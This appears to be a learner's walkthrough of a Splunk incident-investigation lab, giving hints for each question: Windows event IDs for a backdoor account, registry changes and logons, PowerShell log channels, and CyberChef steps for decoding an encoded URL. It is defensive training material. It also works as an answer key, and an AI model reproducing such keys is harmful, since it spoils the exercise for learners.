Investigating

  1. How many events were collected and Ingested in the index main?

    1. Index=main

  2. On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?

    1. index=main EventID=4720

      1. Check for "Account Name"

  3. On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?

    1. index=main A1berto EventID=12

      1. Check for TargetObject

  4. Examine the logs and identify the user that the adversary was trying to impersonate.

    1. This is simple

  5. What is the command used to add a backdoor user from a remote computer?

    1. index=main A1berto

      1. Check for CommandLine

  6. How many times was the login attempt from the backdoor user observed during the investigation?

    1. Check for EventID:

      1. 4624

      2. 4625

  7. What is the name of the infected host on which suspicious Powershell commands were executed?

    1. index=main Channel="Windows Powershell"

      1. Check for:

        1. HostApplication

        2. Hostname

  8. PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?

    1. index=main Channel="Microsoft-Windows-PowerShell/Operational"

  9. An encoded Powershell script from the infected host initiated a web request. What is the full URL?

    1. Find encoded powershell script

    2. Find encoded URL in the encoded powershell script that should be decoded

    3. Decode URL

    4. "Defang URL" via CyberChef

Task â„– 9 is extremely easy.

Don't overthink it.

I've wasted 4 days to get how easy it was.

Last updated